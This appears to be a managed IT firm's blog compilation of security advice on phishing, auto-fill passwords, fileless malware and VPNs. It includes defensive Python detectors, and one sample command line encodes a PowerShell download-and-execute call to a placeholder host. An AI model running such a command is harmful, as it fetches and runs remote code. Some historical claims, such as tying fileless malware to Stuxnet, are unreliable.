How to Implement Better Cyber Hygiene Practices as Employees Work Remotely

Erik Haas, director of sales and marketing, was interviewed for ASAE and offered some basic measures that organizations should take to improve their cybersecurity posture. designDATA, AHT Insurance, and Hartman Executive Advisors share their perspectives with ASAE on how to mitigate cybersecurity risk in a remote work environment:

https://www.asaecenter.org/resources/articles/an_plus/2020/april/how-to-implement-better-cyber-hygiene-practices-as-employees-work-remote/?MessageRunDetailID=1718343401&PostID=14279524&utm_medium=email&utm_source=rasa_io

Phishing Scams Aim to Exploit Coronavirus Fears

How To Keep Uninvited Guests Out of Your Zoom Event

Zoom provides videotelephony and online chat services through a cloud-based peer-to-peer software platform and is used for teleconferencing, telecommuting, distance education, and social relations. With most of the country working from home and using Zoom as well as other cloud-based communications, there has been an uptick in hacking stories. So, what are we to do? Let’s look at a few ways we can practice Zoom safety. At designDATA, we believe the following best practices will help:

  • Create separate passwords for each virtual meeting.
  • Establish a Zoom waiting room for meeting participants.
  • Lock down the meeting once everyone invited to attend has joined.
  • Do not publicly post meeting links on social media or any other public forum.

Why autocomplete passwords are risky

Many people use auto-fill passwords for their convenience. What you might not know is that hackers and advertisers can use them to get access to websites and other applications and gather sensitive information. Learn more about the risks of using autocomplete passwords.

Why auto-fill passwords are so dangerous

Certain web browsers have integrated features that enable usernames and passwords to be automatically entered into a web form. There are also password manager applications that have made it easy to access login credentials. But these aren’t completely safe. They can become a liability if hackers gain access to computers or browsers.

For example, if a hacker gains access to just one account, it’ll be easier for them to obtain access to other accounts because the autocomplete feature will fill in all other saved credentials.

Tricking a browser or password manager into giving up saved information is incredibly simple. All a hacker needs to do is place an invisible form on a compromised webpage to collect users’ login information.

Using auto-fill to track users

For over a decade, there’s been a password security tug-of-war between hackers and cybersecurity professionals. Little do users know that shrewd digital marketers also use password auto-fill to track user activity.

Digital marketing groups AdThink and OnAudience have been placing these invisible login forms on websites to monitor the sites that users visit. AdThink and OnAudience track people based on the usernames in hidden auto-fill forms and sell the information they gather to advertisers. While the intention is not to steal passwords, there’s always the likelihood of exposure.

One simple security tip for today

A quick and effective way to improve your account security is to turn off auto-fill in your web browser. Here’s how to do it:

  • If you’re using Chrome – Open the Settings window, click Advanced, and select the appropriate settings under Manage Passwords.
  • If you’re using Firefox – Open the Options window, click Privacy, and under the History heading, select “Firefox will: Use custom settings for history.” In the new window, disable “Remember search and form history.”
  • If you’re using Safari – Open the Preferences window, select the Auto-fill tab, and turn off all the features related to usernames and passwords.

Being cautious about your password security habits can go a long way in protecting your sensitive data. For managed, 24/7 cybersecurity assistance that goes far beyond protecting your privacy, call us today.

3 Hacker types you need to know about

What do you call someone who hunts for security gaps in computer hardware and software? A hacker, right? What about someone who executes a vulnerability test and presents their findings to software vendors to help them improve the quality of their products? There is more than one type of hacker, and understanding the difference is important.

A complicated history

In the 1950s, the term “hacker” was vaguely defined. As computers became more accessible, the word was used to describe someone who explored the details and limits of computer technology by testing them from a variety of angles.

But by the 1980s, hackers became associated with teenagers who were caught breaking into government computer systems — partially because that is what they called themselves, and partially because the word hacker has an inherently aggressive ring to it.

Today, several of those pioneering hackers run multimillion-dollar cybersecurity consulting businesses, while countless others run amok online, hoping to make a quick buck off of hapless victims.

“Black hat” hackers

Closer to the definition that most people outside the IT world know and use, black hat hackers create programs and campaigns to commit all sorts of malicious acts. Crimes such as identity theft, credit card fraud, and extortion are for their sole benefit, but they can also work under the auspices of a corporation or a state and commit espionage and cyberterrorism.

During the 1990s, Kevin Mitnick was a prime example of a black hat hacker. Mitnick went on a two-and-a-half-year hacking spree wherein he committed wire fraud and stole millions of dollars of data from telecom companies and the National Defense warning system.

After paying his debt to society by spending five years in prison, he set up his own eponymous cybersecurity firm and became its CEO and Chief White Hat Hacker.

“White hat” hackers

Sometimes referred to as ethical hackers or plain old network security specialists, these are the good guys. Whether it’s selling what they find to hardware and software vendors in “bug bounty” programs or working as full-time technicians, white hat hackers are just interested in making an honest buck.

Linus Torvalds is a great example of a white hat hacker. After years of experimenting with the Sinclair QDOS operating system on his Sinclair QL, he released Linux, a secure open-source operating system.

“Gray hat” hackers

Whether someone is a security specialist or a cybercriminal, the majority of their work is usually conducted over the internet. This anonymity affords them opportunities to try their hands at both white hat and black hat hacking.

For example, Marcus Hutchins is a known gray hat hacker. He’s most famous for testing the WannaCry ransomware until he found a way to stop it.

During the day, Hutchins works for the Kryptos Logic cybersecurity firm, but the US government believes he spent his free time creating the Kronos banking malware. He was arrested in 2017 and branded a “gray hat” hacker.

Defend against this new Office 365 threat

Some hackers have become so skilled that they don’t even need you to give up your credentials to hack into your account. One recent cyberthreat is targeted towards users of Microsoft Office 365. You don’t want to be the next victim, so read up.

A phishing scam that harvests users’ credentials

The latest cyberattack on Microsoft Office 365 involves harvesting users’ credentials. In this previously unseen tactic, scammers send users a phishing message asking them to click on an embedded link. What makes this scam more insidious than traditional phishing scams is that the URL within the message links to a real Microsoft login page.

How does it work?

The phishing message resembles a legitimate SharePoint and OneDrive file-share that prompts users to click on it. Once they do, they are taken to an Office 365 login page where they will be asked to log in if they haven’t already.

After they’ve logged in, they’ll be prompted to grant permission to an app called “0365 Access.” Users who grant permission effectively give the app — and the hackers behind it — complete access to their Office 365 files, contacts, and inbox.

This technique can easily trick lots of users since the app that requests access is integrated with the Office 365 Add-ins feature. That means that Microsoft essentially generates the request for permission. No, Microsoft is not aiding hackers to breach systems. Rather, the scam is made possible by a feature that allows users to install apps that are not from the official Office Store.

Ways to protect your Office 365 account — and your business

Given their fairly advanced approach, these scammers could effortlessly prey on careless employees. There are ways to make sure that doesn’t happen.

  • Always check the email’s sender account before clicking on any link or granting apps access.
  • Implement a policy that prevents staff from downloading and installing apps that are not from the Office Store.
  • Regularly conduct security awareness training that covers essential cybersecurity topics. Educate employees on how to spot phishing scam red flags (e.g., unknown senders, grammatical and typographical errors, suspicious requests, and the like). Increase their knowledge about more sophisticated attacks and keep everyone informed about current and future cybersecurity risks.
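
One way to back the app policy above with a check, as an added example that is not part of the original article: review app-consent events for a lookalike name such as “0365 Access” and for scopes that cover files, contacts, and inbox. The event fields (`user`, `app_name`, `app_id`, `scopes`) are a simplified, hypothetical export format, and the allowlist ID is a placeholder.

```python
"""Review app-consent events for the consent-phishing pattern described above."""
import json

# Delegated Microsoft Graph scopes that expose mail, files and contacts,
# plus offline_access, which lets an app keep access through refresh tokens.
BROAD_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "Files.Read.All", "Files.ReadWrite.All",
    "Contacts.Read", "Contacts.ReadWrite", "offline_access",
}
BRANDS = ("o365", "office", "microsoft", "onedrive", "sharepoint")
LOOKALIKE = str.maketrans("01", "ol")  # digit-for-letter swaps such as "0365"

# Hypothetical tenant allowlist of approved application IDs (placeholder value).
APPROVED_APP_IDS = {"11111111-1111-1111-1111-111111111111"}


def spoofed_brand(app_name):
    """Return the brand a name imitates through digit swaps, or None."""
    raw = app_name.lower()
    normalised = raw.translate(LOOKALIKE)
    for brand in BRANDS:
        if brand in normalised and brand not in raw:
            return brand
    return None


def review_consent(event):
    """Return the reasons a consent grant needs review (empty list = fine)."""
    if event["app_id"] in APPROVED_APP_IDS:
        return []
    reasons = ["app not on allowlist"]
    brand = spoofed_brand(event["app_name"])
    if brand:
        reasons.append(f"name imitates '{brand}'")
    broad = sorted(set(event["scopes"]) & BROAD_SCOPES)
    if broad:
        reasons.append("broad scopes: " + ", ".join(broad))
    return reasons


def flag_events(lines):
    flagged = []
    for line in lines:
        event = json.loads(line)
        reasons = review_consent(event)
        if reasons:
            flagged.append((event["user"], event["app_name"], reasons))
    return flagged


# Constructed sample events, one JSON object per line.
SAMPLE_EVENTS = [
    '{"user": "alice", "app_name": "Contoso Expenses", '
    '"app_id": "11111111-1111-1111-1111-111111111111", "scopes": ["User.Read"]}',
    '{"user": "bob", "app_name": "0365 Access", '
    '"app_id": "22222222-2222-2222-2222-222222222222", '
    '"scopes": ["Mail.Read", "Files.ReadWrite.All", "Contacts.Read", "offline_access"]}',
    '{"user": "carol", "app_name": "Team Poll", '
    '"app_id": "33333333-3333-3333-3333-333333333333", "scopes": ["User.Read"]}',
]

if __name__ == "__main__":
    for user, app, reasons in flag_events(SAMPLE_EVENTS):
        print(f"{user} consented to {app!r}: " + "; ".join(reasons))
```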

Successful attacks could result in an unimaginable catastrophe to your company. For tips on how to spot this and other nefarious scams and how to plan thorough security practices, contact our experts today.

Mitigating cybersecurity insider threats

Did you know that in some industries the biggest cybersecurity threats come from inside a breached organization? Sometimes it’s motivated by financial gain and sometimes it’s plain-old ignorance. So how can you protect your organization from insider threats?

#1 Educate

You must teach your team to recognize personally identifiable information (PII) and understand the financial implications of a breach. Each employee needs to grasp the risks associated with violating specific state or federal regulations regarding data privacy and security. For example, when a celebrity is admitted to the hospital, employees may be tempted to sneak a peek at their medical records. As innocent as that may seem, it could result in a hefty HIPAA fine.

#2 Deter

You must put easy-to-understand policies in place to prevent an insider from breaching company data. And those policies must be strictly enforced. In fact, almost every regulatory framework pertaining to data security requires that these policies are published where they can be easily found and that you present them in company-wide meetings. In some cases, you may be forced to put a person in charge of holding everyone in the company accountable to following the policies.

#3 Detect

Businesses must have systems in place to identify data breaches and their sources as quickly as possible. You should be able to see any time someone accessed PII. This speeds up the breach response time by revealing when unauthorized personnel viewed something they shouldn’t have. It’s significantly easier to stem the spread of a breach with an effective audit trail in place.

#4 Investigate

When a privacy or security breach is detected, certain actions must be taken to limit the damages. For example, after the cause of a breach has been identified, your team should create new policies and procedures to ensure it can’t happen a second time. In the case of an insider threat, that might mean revoking data access privileges to a department that never actually needed them.

#5 Train

Since IT systems are constantly evolving and easy to accidentally bypass, your employees must undergo regular data security training. A one-day seminar is a great start, but incorporating short, weekly reminders or activities will go a long way toward keeping everything fresh in their minds. Consider using a variety of media, such as emails, break-room posters, and even face-to-face interviews.

Is your company’s data secure from insider threats? Call us today for a quick chat with one of our experts for more information.

Cybersecurity for small- and medium-sized businesses

Has your organization been hit with a data breach or ransomware recently? This happens more often than you might think to businesses of all sizes. Given the frequency, complexity, and increasing number of threats, a multi-level, agile, and cutting-edge cybersecurity strategy is the only response that will protect businesses from massive losses. Fortunately, managed IT services providers (MSPs) are filling this gap with solutions and expertise that even small businesses can afford.

The numbers

According to the Ponemon Institute’s 2018 State of Cybersecurity in Small & Medium Size Businesses (SMBs) survey, cyber attacks on SMBs have increased from 61 percent in 2017 to 67 percent in 2018. Only 28 percent of these SMBs evaluated their ability to mitigate threats, vulnerabilities, and attacks as highly effective. 58 percent of SMBs in the study experienced a data breach in the last year.

Most SMBs in Ponemon’s research said attacks against their companies had severe financial consequences. For instance, the report cited that many of them spent an average of $1.43 million because of the damage or breach of IT resources, a 33 percent increase from 2017. Disruption to operations also cost an average of $1.56 million, a 25 percent increase from 2017.

The attacks

So what types of cyberattacks on SMBs were prevalent in 2018? According to the study, the order from most to least common is as follows: phishing/social engineering, web-based attacks, general malware, compromised/stolen devices, denial of services, advanced malware/zero day attacks, SQL injection, malicious insider, cross-site scripting, and uncategorized attacks.

Why managed services?

Partnering with MSPs is the most effective way to prevent attacks and protect your business from these malicious threats. Managed services include a full range of proactive IT support that focuses on advanced security, such as around-the-clock monitoring, data encryption and backup, real-time threat prevention and elimination, network and firewall protection, security awareness training, and more.

Not only that, but because managed services are designed to identify and fix weak spots in your IT infrastructure, you’ll optimize the digital backbone of your business processes. You’ll have faster network performance, a business continuity and disaster recovery strategy, as well as minimal downtime. One of the best things about managed services is that you get a dedicated team of IT professionals ready to assist you with any technology problems you may encounter. This is much more effective and budget-friendly than having in-house personnel handling all your IT issues.

Being proactive when it comes to cybersecurity is the only way to protect what you’ve worked hard to build. If you’d like to know more about how managed services can benefit your business, just give us a call. We’re sure to help.

Published with permission from TechAdvisory.org.

A closer look at fileless malware

To avoid detection by antimalware programs, cybercriminals are increasingly abusing legitimate software tools and legitimate programs in systems to steal data or ruin its integrity. They use fileless malware to infiltrate trusted applications and issue executables that blend in with normal network traffic or IT/system administration tasks while leaving fewer footprints. Ultimately, your business could be at risk. Let’s see why.

What is fileless malware?

Fileless malware is stored in random access memory (RAM) instead of on the hard drive. In a typical fileless infection, payloads can be injected into the memory of existing software or applications by running scripts within whitelisted or authenticated applications such as PowerShell, which is designed to automate system administration tasks such as viewing all USB devices, drives, and services installed in the system, scheduling a series of demands, or terminating processes (i.e., Task Manager).

Because there are no files to trace, fileless malware escapes detection by most antimalware programs, especially those that use databases of precedents. Furthermore, most automated sensors cannot recognize illicit scripts, and cybersecurity analysts who are trained to identify them usually have a difficult time establishing where to start looking. Fileless malware isn’t as visible as traditional malware. It employs a variety of techniques to stay persistent, and can adversely affect the integrity of a business’s processes and the infrastructure that runs them.
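
Since the script text never lands on disk, the process command line is one place an analyst can start looking. The following added example (not part of the original article) checks constructed process-creation command lines for PowerShell launches that pass a base64-encoded script or use in-memory execution idioms; the indicator names and sample lines are assumptions made for the illustration.

```python
"""Flag PowerShell launches that carry script text in memory rather than in a file."""
import base64
import binascii
import re

POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# Any "-flag value" pair whose value looks like base64.
FLAG_VALUE = re.compile(r"\s-([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})")

# Heuristic indicator names (chosen for this example) and their patterns.
INDICATORS = {
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download-to-memory": re.compile(r"downloadstring|downloaddata", re.I),
    "base64-in-script": re.compile(r"frombase64string", re.I),
    "reflective-load": re.compile(r"reflection\.assembly\]::load", re.I),
    "hidden-window": re.compile(r"\s-w[a-z]*\s+hidden\b", re.I),
}


def decode_encoded_command(cmdline):
    """Return (found, script) for -EncodedCommand or one of its abbreviations."""
    for flag, blob in FLAG_VALUE.findall(cmdline):
        flag = flag.lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                return True, base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return True, ""  # encoded but unreadable: still worth a look
    return False, ""


def analyze(cmdline):
    """Return the sorted indicator names found in one command line."""
    if not POWERSHELL.search(cmdline):
        return []
    found, script = decode_encoded_command(cmdline)
    hits = {"encoded-command"} if found else set()
    text = cmdline + "\n" + script
    hits.update(name for name, rx in INDICATORS.items() if rx.search(text))
    return sorted(hits)


def encode_for_sample(script):
    """Build the base64/UTF-16LE form PowerShell expects, for the samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines: a routine admin task, an encoded in-memory
# download-and-run, and an encoded but harmless query.
SAMPLES = [
    r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
    "powershell.exe -NoProfile -w hidden -enc " + encode_for_sample(
        "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s.ps1')"),
    "powershell.exe -EncodedCommand " + encode_for_sample(
        "Get-Service | Where-Object Status -eq 'Running'"),
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line) or "no indicators", "<-", line[:60])
```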

Fileless malware by the numbers

Cybersecurity firm Kaspersky Lab first discovered a type of fileless malware on its very own network a couple of years ago. The final verdict was that it originated from the Stuxnet strain of state-sponsored cyber warfare. The high level of sophistication and government funding meant fileless malware was virtually nonexistent until the beginning of 2017.

In November 2016, attacks using fileless malware saw an uptick of 13% according to a report. In the same quarter, attacks surged 33% compared to the first quarter. During the first quarter of 2017, more PowerShell-related attacks were reported on more than 12,000 unique machines.

Kaspersky Lab uncovered over 140 infections across 40 different countries. Almost every instance of the fileless malware was found in financial institutions and worked towards obtaining login credentials. In the worst cases, infections had already gleaned enough information to allow cyberattackers to withdraw undisclosed sums of cash from ATMs.

In 2018, cybersecurity firm Trend Micro detected a rising trend of fileless threats throughout the first half of the year.

Is your business at risk?

It is unlikely your business would have been targeted in the earliest stages of this particular strain of malware, but it’s better to be safe than sorry. Businesses should practice defense in depth, where multilayered safeguards are implemented to reduce exposure and mitigate damage. But apart from cultivating a security-aware workforce, what actionable countermeasures can organizations take?

While your business might not be in immediate danger, you should employ solutions that analyze trends in behavior. It is also wise to invest in a managed service provider that offers 24/7 network monitoring, proper patches, and software updates. Call today to get started.

The dangers of autocomplete passwords

Hackers have found a new way to track you online. Aside from using advertisements and suggestions, they can now use autocomplete passwords to track you down. Feeling insecure? Here are some ways to keep you out of harm’s way.

Why auto-fill passwords are so dangerous

As of December 2018, there are 4.1 billion internet users in the world. This means users have to create dozens of passwords, either to protect their account or simply to meet the password-creation requirements of the platform they’re using. Unfortunately, only 20% of US internet users have different passwords for their multiple online accounts.

Certain web browsers have integrated a mechanism that enables usernames and passwords to be automatically entered into a web form. On the other hand, password manager applications have made it easy to access login credentials. But these aren’t completely safe.

Tricking a browser or password manager into giving up this saved information is incredibly simple. All a hacker needs to do is place an invisible form on a compromised webpage to collect users’ login information.

Using auto-fill to track users

For over a decade, there’s been a password security tug-of-war between hackers and cybersecurity professionals. Little do many people know that shrewd digital marketers also use password auto-fill to track user activity.

Digital marketing groups AdThink and OnAudience have been placing these invisible login forms on websites to track the sites that users visit. They’ve made no attempts to steal passwords, but security professionals said it wouldn’t have been hard for them to do. AdThink and OnAudience simply tracked people based on the usernames in hidden auto-fill forms and sold the information they gathered to advertisers.
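
Site owners can audit their own pages for the invisible login forms described here and in the earlier auto-fill article. The following added example (not part of the original article) scans a saved DOM snapshot for credential inputs hidden by inline styles or the `hidden` attribute; it assumes inline styling only, so elements hidden through stylesheets need a check against computed styles in a real browser.

```python
"""Audit a saved DOM snapshot for credential inputs the user cannot see."""
import re
from html.parser import HTMLParser

# Inline styles that take an element out of view (heuristic, not exhaustive).
HIDING_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|opacity\s*:\s*0(?:\.0+)?\s*(?:;|$)"
    r"|(?<![-\w])(?:width|height)\s*:\s*0(?:px)?\s*(?:;|$)"
    r"|(?:left|top)\s*:\s*-\d{3,}px",
    re.I,
)
CRED_NAME = re.compile(r"user|login|email|pass", re.I)
CRED_AUTOCOMPLETE = {"username", "email", "current-password", "new-password"}
VOID_TAGS = {"input", "br", "img", "hr", "meta", "link"}


def is_credential_input(attrs):
    """True for text-like inputs that look like username or password fields."""
    kind = (attrs.get("type") or "text").lower()
    if kind == "password":
        return True
    if kind not in {"text", "email"}:  # type="hidden" (e.g. CSRF tokens) is skipped
        return False
    tokens = set((attrs.get("autocomplete") or "").lower().split())
    label = f"{attrs.get('name') or ''} {attrs.get('id') or ''}"
    return bool(tokens & CRED_AUTOCOMPLETE) or bool(CRED_NAME.search(label))


class HiddenCredentialFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.open_elements = []  # (tag, hidden) for each open ancestor
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        inherited = bool(self.open_elements) and self.open_elements[-1][1]
        hidden = (inherited or "hidden" in attrs
                  or HIDING_STYLE.search(attrs.get("style") or "") is not None)
        if tag == "input" and hidden and is_credential_input(attrs):
            self.findings.append(attrs.get("name") or attrs.get("id") or "(unnamed)")
        if tag not in VOID_TAGS:
            self.open_elements.append((tag, hidden))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; ignore stray closers.
        for i in range(len(self.open_elements) - 1, -1, -1):
            if self.open_elements[i][0] == tag:
                del self.open_elements[i:]
                break


def find_hidden_credential_fields(html):
    finder = HiddenCredentialFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: a visible login form, two invisible ones, a search form.
SAMPLE = """
<form action="/login"><input type="email" name="email"><input type="password" name="password"></form>
<div style="position:absolute; left:-9999px">
  <form><input type="text" name="username" autocomplete="username"><input type="password" name="pw"></form>
</div>
<form style="display:none"><input name="login_email"></form>
<form><input type="hidden" name="csrf_token" value="x"><input type="text" name="q"></form>
"""

if __name__ == "__main__":
    for name in find_hidden_credential_fields(SAMPLE):
        print("invisible credential field:", name)
```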

One simple security tip for today

A quick and effective way to improve your account security is to turn off auto-fill in your web browser. Here’s how to do it:

  • If you’re using Chrome – Open the Settings window, click Advanced, and select the appropriate settings under Manage Passwords.
  • If you’re using Firefox – Open the Options window, click Privacy, and under the History heading, select “Firefox will: Use custom settings for history.” In the new window, disable “Remember search and form history.”
  • If you’re using Safari – Open the Preferences window, select the Auto-fill tab, and turn off all the features related to usernames and passwords.

This is just one small thing you can do to keep your accounts and the information they contain safe. For managed, 24×7 cybersecurity assistance that goes far beyond protecting your privacy, call us today.

Benefits of using a VPN

While using a virtual private network or VPN isn’t a silver bullet to online privacy threats, it still offers crucial security benefits, especially if any part of your day involves using unsecured channels such as public Wi-Fi. Given its importance, how do you pick the right one and what factors do you need to consider?

What is a VPN?

The best way to describe a VPN is as a secure tunnel between your device and destinations you visit on the internet. Once you’ve established your PC’s connection to a VPN server, your computer acts as if it’s on the same local connection as the VPN making it seem you moved to a different location. As far as websites are concerned, you’re browsing from that server’s geographical location, not your computer’s actual location.

When you surf the web through a VPN, all the data transmitted and received is also encrypted, preventing anyone — from hackers to government agencies — from monitoring your online activities.

Why should you have one?

Of course, security and privacy are major reasons why you would want a VPN. For example, if you’re connected to a public Wi-Fi network — like the ones you typically encounter at local cafes and airports — using a VPN encrypts the information you’re sending or accessing online. This means your credit card details, login credentials, private conversations, or other sensitive documents can’t be intercepted by a third party.

VPNs are also useful for accessing geo-restricted websites. If you’re traveling abroad and certain US websites are blocked in that region, you can connect to a VPN located in the US to access the sites you need.

Which VPN should you choose?

Given the increasing demand for secure online privacy, VPNs are surging in popularity. The following considerations can help you find the right one.

1. Cost
While free VPNs are available, we strongly suggest you avoid them as they could keep logs of your internet activity, and in some cases sell them to data brokers or worse, cybercriminals.

Maintaining a VPN service is also expensive, which means the free ones will likely plaster ads on your browser to make a quick buck.

Paid VPNs like SurfEasy and StrongVPN often come with more robust features and configurations that keep you secure. Prices differ depending on a VPN’s features and subscription length, and remember that how you pay is also important. Some VPNs offer anonymous payment systems like bitcoin while others allow you to use gift cards to avoid giving out your personal information.

2. Location
The physical location of VPN servers is important if you want to access region-blocked websites. So if you’re planning on accessing a UK-based service, your VPN provider must at least have servers installed in London.

3. Capacity
Read through a VPN provider’s terms of service to determine how much data you’re allowed to use. If possible, find out how many servers a VPN provider has. If they have plenty of servers online, you can rest assured that they have the capacity to support your internet browsing.

4. Device compatibility
Another important factor to consider is whether the VPN can be used across multiple devices. Nowadays, employees work on laptops, tablets, and smartphones, so you’ll want a VPN that’s compatible with all these.

5. IP leaking
Beyond the fundamental nuts and bolts of the VPN protocol, there are other challenges like dealing with leaky tunnels, which means your IP address could be tracked. A great way to evaluate a VPN service is to sign up for their free trial service and visit https://ipleak.net. This will allow you to check whether your real IP address is actually being leaked. If it tracks your physical location, you should opt for a more reliable VPN service.

VPNs are now a vital component of cybersecurity, and if you need help selecting the right one for your business, consult with our security experts today. We also offer comprehensive cybersecurity services so no hacker or third party can get their hands on your data.